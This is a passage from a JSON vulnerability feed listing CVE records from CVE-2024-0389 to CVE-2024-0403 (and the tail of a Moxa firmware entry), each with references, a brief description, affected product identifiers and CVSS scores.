"cpe:2.3:h:moxa:eds-4014:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:moxa:eds-g4008_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:moxa:eds-g4008:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:moxa:eds-g4012_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:moxa:eds-g4012:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:moxa:eds-g4014_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "3.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:moxa:eds-g4014:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 2.5 } }, "publishedDate" : "2024-02-26T16:27Z", "lastModifiedDate" : "2025-02-25T22:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0389", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://drive.google.com/file/d/1Vi-IGjAZbitDqEvmd9ONrxE0MgB8-v1I/view?usp=sharing", "name" : "https://drive.google.com/file/d/1Vi-IGjAZbitDqEvmd9ONrxE0MgB8-v1I/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://drive.google.com/file/d/1Vi-IGjAZbitDqEvmd9ONrxE0MgB8-v1I/view?usp=sharing", "name" : "https://drive.google.com/file/d/1Vi-IGjAZbitDqEvmd9ONrxE0MgB8-v1I/view?usp=sharing", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.250230", "name" : "https://vuldb.com/?ctiid.250230", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.250230", "name" : "https://vuldb.com/?ctiid.250230", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250230", "name" : "https://vuldb.com/?id.250230", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.250230", "name" : "https://vuldb.com/?id.250230", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in SourceCodester Student Attendance System 1.0. Affected is an unknown function of the file attendance_report.php. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250230 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:student_attendance_system_project:student_attendance_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-10T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0390", "ASSIGNER" : "cvd@cert.pl" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-798" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cert.pl/en/posts/2024/02/CVE-2024-0390/", "name" : "https://cert.pl/en/posts/2024/02/CVE-2024-0390/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://cert.pl/en/posts/2024/02/CVE-2024-0390/", "name" : "https://cert.pl/en/posts/2024/02/CVE-2024-0390/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://cert.pl/posts/2024/02/CVE-2024-0390/", "name" : "https://cert.pl/posts/2024/02/CVE-2024-0390/", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://cert.pl/posts/2024/02/CVE-2024-0390/", "name" : "https://cert.pl/posts/2024/02/CVE-2024-0390/", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "INPRAX \"iZZi connect\" application on Android contains hard-coded MQTT queue credentials. The same MQTT queue is used by corresponding physical recuperation devices. Exploiting this vulnerability could potentially allow unauthorized access to manage and read parameters of the recuperation unit \"reQnet iZZi\".This issue affects \"iZZi connect\" application versions before 2024010401.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:inprax:izzi_connect:*:*:*:*:*:android:*:*", "versionEndExcluding" : "2024010401", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-15T10:15Z", "lastModifiedDate" : "2025-03-13T18:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0392", "ASSIGNER" : "security@wso2.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2023-2987/", "name" : "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2023-2987/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A Cross-Site Request Forgery (CSRF) vulnerability exists in the management console of WSO2 Enterprise Integrator 6.6.0 due to the absence of CSRF token validation. This flaw allows attackers to craft malicious requests that can trigger state-changing operations on behalf of an authenticated user, potentially compromising account settings and data integrity. The vulnerability only affects a limited set of state-changing operations, and successful exploitation requires social engineering to trick a user with access to the management console into performing the malicious action." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-27T07:15Z", "lastModifiedDate" : "2025-02-27T07:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0393", "ASSIGNER" : "cve@rapid7.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID was unused by the CNA." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-01-12T06:15Z", "lastModifiedDate" : "2024-01-12T06:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0394", "ASSIGNER" : "cve@rapid7.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.rapid7.com/blog/post/2024/04/03/cve-2024-0394-rapid7-minerva-armor-privilege-escalation-fixed/", "name" : "https://www.rapid7.com/blog/post/2024/04/03/cve-2024-0394-rapid7-minerva-armor-privilege-escalation-fixed/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.rapid7.com/blog/post/2024/04/03/cve-2024-0394-rapid7-minerva-armor-privilege-escalation-fixed/", "name" : "https://www.rapid7.com/blog/post/2024/04/03/cve-2024-0394-rapid7-minerva-armor-privilege-escalation-fixed/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rapid7 Minerva Armor versions below 4.5.5 suffer from a privilege escalation vulnerability whereby an authenticated attacker can elevate privileges and execute arbitrary code with SYSTEM privilege.  The vulnerability is caused by the product's implementation of OpenSSL's`OPENSSLDIR` parameter where it is set to a path accessible to low-privileged users.  The vulnerability has been remediated and fixed in version 4.5.5. \n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-04-03T14:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0395", "ASSIGNER" : "patrick@puiterwijk.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: NON Security Issue." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-01-10T14:15Z", "lastModifiedDate" : "2024-01-10T14:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0396", "ASSIGNER" : "security@progress.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-January-2024", "name" : "https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-January-2024", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-January-2024", "name" : "https://community.progress.com/s/article/MOVEit-Transfer-Service-Pack-January-2024", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.progress.com/moveit", "name" : "https://www.progress.com/moveit", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.progress.com/moveit", "name" : "https://www.progress.com/moveit", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nIn Progress MOVEit Transfer versions released before 2022.0.10 (14.0.10), 2022.1.11 (14.1.11), 2023.0.8 (15.0.8), 2023.1.3 (15.1.3), an input validation issue was discovered. An authenticated user can manipulate a parameter in an HTTPS transaction. The modified transaction could lead to computational errors within MOVEit Transfer and potentially result in a denial of service.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023.1.0", "versionEndExcluding" : "2023.1.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2023.0.1", "versionEndExcluding" : "2023.0.8", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2022.0.10", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*", "versionStartIncluding" : "2022.1.0", "versionEndExcluding" : "2022.1.11", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "HIGH", "baseScore" : 7.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 4.2 } }, "publishedDate" : "2024-01-17T16:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0397", "ASSIGNER" : "cna@python.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "http://www.openwall.com/lists/oss-security/2024/06/17/2", "name" : "http://www.openwall.com/lists/oss-security/2024/06/17/2", "refsource" : "", "tags" : [ ] }, { "url" : "http://www.openwall.com/lists/oss-security/2024/06/17/2", "name" : "http://www.openwall.com/lists/oss-security/2024/06/17/2", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/01c37f1d0714f5822d34063ca7180b595abf589d", "name" : "https://github.com/python/cpython/commit/01c37f1d0714f5822d34063ca7180b595abf589d", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/01c37f1d0714f5822d34063ca7180b595abf589d", "name" : "https://github.com/python/cpython/commit/01c37f1d0714f5822d34063ca7180b595abf589d", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/29c97287d205bf2f410f4895ebce3f43b5160524", "name" : "https://github.com/python/cpython/commit/29c97287d205bf2f410f4895ebce3f43b5160524", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/29c97287d205bf2f410f4895ebce3f43b5160524", "name" : "https://github.com/python/cpython/commit/29c97287d205bf2f410f4895ebce3f43b5160524", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/37324b421b72b7bc9934e27aba85d48d4773002e", "name" : "https://github.com/python/cpython/commit/37324b421b72b7bc9934e27aba85d48d4773002e", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/37324b421b72b7bc9934e27aba85d48d4773002e", "name" : "https://github.com/python/cpython/commit/37324b421b72b7bc9934e27aba85d48d4773002e", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/542f3272f56f31ed04e74c40635a913fbc12d286", "name" : "https://github.com/python/cpython/commit/542f3272f56f31ed04e74c40635a913fbc12d286", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/542f3272f56f31ed04e74c40635a913fbc12d286", "name" : "https://github.com/python/cpython/commit/542f3272f56f31ed04e74c40635a913fbc12d286", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/b228655c227b2ca298a8ffac44d14ce3d22f6faa", "name" : "https://github.com/python/cpython/commit/b228655c227b2ca298a8ffac44d14ce3d22f6faa", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/b228655c227b2ca298a8ffac44d14ce3d22f6faa", "name" : "https://github.com/python/cpython/commit/b228655c227b2ca298a8ffac44d14ce3d22f6faa", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/bce693111bff906ccf9281c22371331aaff766ab", "name" : "https://github.com/python/cpython/commit/bce693111bff906ccf9281c22371331aaff766ab", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/commit/bce693111bff906ccf9281c22371331aaff766ab", "name" : "https://github.com/python/cpython/commit/bce693111bff906ccf9281c22371331aaff766ab", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/issues/114572", "name" : "https://github.com/python/cpython/issues/114572", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/issues/114572", "name" : "https://github.com/python/cpython/issues/114572", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/pull/114573", "name" : "https://github.com/python/cpython/pull/114573", "refsource" : "", "tags" : [ ] }, { "url" : "https://github.com/python/cpython/pull/114573", "name" : "https://github.com/python/cpython/pull/114573", "refsource" : "", "tags" : [ ] }, { "url" : "https://mail.python.org/archives/list/security-announce@python.org/thread/BMAK5BCGKYWNJOACVUSLUF6SFGBIM4VP/", "name" : "https://mail.python.org/archives/list/security-announce@python.org/thread/BMAK5BCGKYWNJOACVUSLUF6SFGBIM4VP/", "refsource" : "", "tags" : [ ] }, { "url" : "https://mail.python.org/archives/list/security-announce@python.org/thread/BMAK5BCGKYWNJOACVUSLUF6SFGBIM4VP/", "name" : "https://mail.python.org/archives/list/security-announce@python.org/thread/BMAK5BCGKYWNJOACVUSLUF6SFGBIM4VP/", "refsource" : "", "tags" : [ ] }, { "url" : "https://security.netapp.com/advisory/ntap-20250411-0006/", "name" : "https://security.netapp.com/advisory/ntap-20250411-0006/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A defect was discovered in the Python “ssl” module where there is a memory\nrace condition with the ssl.SSLContext methods “cert_store_stats()” and\n“get_ca_certs()”. The race condition can be triggered if the methods are\ncalled at the same time as certificates are loaded into the SSLContext,\nsuch as during the TLS handshake with a certificate directory configured.\nThis issue is fixed in CPython 3.10.14, 3.11.9, 3.12.3, and 3.13.0a5." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-06-17T16:15Z", "lastModifiedDate" : "2025-04-11T22:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0398", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-07-05T23:15Z", "lastModifiedDate" : "2025-07-05T23:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0399", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/1550e30c-bf80-48e0-bc51-67d29ebe7272/", "name" : "https://wpscan.com/vulnerability/1550e30c-bf80-48e0-bc51-67d29ebe7272/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/1550e30c-bf80-48e0-bc51-67d29ebe7272/", "name" : "https://wpscan.com/vulnerability/1550e30c-bf80-48e0-bc51-67d29ebe7272/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WooCommerce Customers Manager WordPress plugin before 29.7 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:vanquish:woocommerce_customers_manager:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "29.7", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-04-15T05:15Z", "lastModifiedDate" : "2025-04-07T14:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0400", "ASSIGNER" : "cybersecurity@hitachienergy.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://publisher.hitachienergy.com/preview?DocumentId=8DBD000189&languageCode=en&Preview=true", "name" : "https://publisher.hitachienergy.com/preview?DocumentId=8DBD000189&languageCode=en&Preview=true", "refsource" : "", "tags" : [ ] }, { "url" : "https://publisher.hitachienergy.com/preview?DocumentId=8DBD000189&languageCode=en&Preview=true", "name" : "https://publisher.hitachienergy.com/preview?DocumentId=8DBD000189&languageCode=en&Preview=true", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "SCM Software is a client and server application. An Authenticated System manager client can execute LINQ query in the SCM server, for customized filtering. An Authenticated malicious client can send a specially crafted code to skip the validation and execute arbitrary code (RCE) on the SCM Server remotely. Malicious clients can execute any command by using this RCE vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-27T03:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0401", "ASSIGNER" : "disclosure@vulncheck.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vulncheck.com/advisories/asus-ovpn-rce", "name" : "https://vulncheck.com/advisories/asus-ovpn-rce", "refsource" : "", "tags" : [ ] }, { "url" : "https://vulncheck.com/advisories/asus-ovpn-rce", "name" : "https://vulncheck.com/advisories/asus-ovpn-rce", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "ASUS routers supporting custom OpenVPN profiles are vulnerable to a code execution vulnerability. An authenticated and remote attacker can execute arbitrary operating system commands by uploading a crafted OVPN profile. Known affected routers include ASUS ExpertWiFi, ASUS RT-AX55, ASUS RT-AX58U, ASUS RT-AC67U, ASUS RT-AC68R, ASUS RT-AC68U, ASUS RT-AX86, ASUS RT-AC86U, ASUS RT-AX88U, and ASUS RT-AX3000." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-05-20T17:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0402", "ASSIGNER" : "cve@gitlab.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-22" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/", "name" : "https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/", "name" : "https://about.gitlab.com/releases/2024/01/25/critical-security-release-gitlab-16-8-1-released/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/437819", "name" : "GitLab Issue #437819", "refsource" : "", "tags" : [ "Broken Link" ] }, { "url" : "https://gitlab.com/gitlab-org/gitlab/-/issues/437819", "name" : "GitLab Issue #437819", "refsource" : "", "tags" : [ "Broken Link" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "An issue has been discovered in GitLab CE/EE affecting all versions from 16.0 prior to 16.6.6, 16.7 prior to 16.7.4, and 16.8 prior to 16.8.1 which allows an authenticated user to write files to arbitrary locations on the GitLab server while creating a workspace." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:16.8.0:*:*:*:community:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:16.8.0:*:*:*:enterprise:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "16.7.0", "versionEndExcluding" : "16.7.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "16.7.0", "versionEndExcluding" : "16.7.4", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "16.0.0", "versionEndExcluding" : "16.5.8", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "16.0.0", "versionEndExcluding" : "16.5.8", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding" : "16.6.0", "versionEndExcluding" : "16.6.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "16.6.0", "versionEndExcluding" : "16.6.6", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.9, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.1, "impactScore" : 6.0 } }, "publishedDate" : "2024-01-26T01:15Z", "lastModifiedDate" : "2024-11-21T08:46Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0403", "ASSIGNER" : "help@fluidattacks.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://fluidattacks.com/advisories/harris/", "name" : "https://fluidattacks.com/advisories/harris/", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] }, { "url" : "https://fluidattacks.com/advisories/harris/", "name" : "https://fluidattacks.com/advisories/harris/", "refsource" : "", "tags" : [ "Exploit", "Vendor Advisory" ] }, { "url" : "https://github.com/TandoorRecipes/recipes/", "name" : "https://github.com/TandoorRecipes/recipes/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://github.com/TandoorRecipes/recipes/", "name" : "https://github.com/TandoorRecipes/recipes/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Recipes version 1.5.10 allows arbitrary HTTP requests to be made\n\nthrough the server. This is possible because the application is\n\nvulnerable to SSRF." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tandoor:recipes:1.5.10:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.9, "impactScore" : 2.5 } }, "publishedDate" : "2024-03-01T00:15Z", "lastModifiedDate" : "2025-05-19T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0404", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : 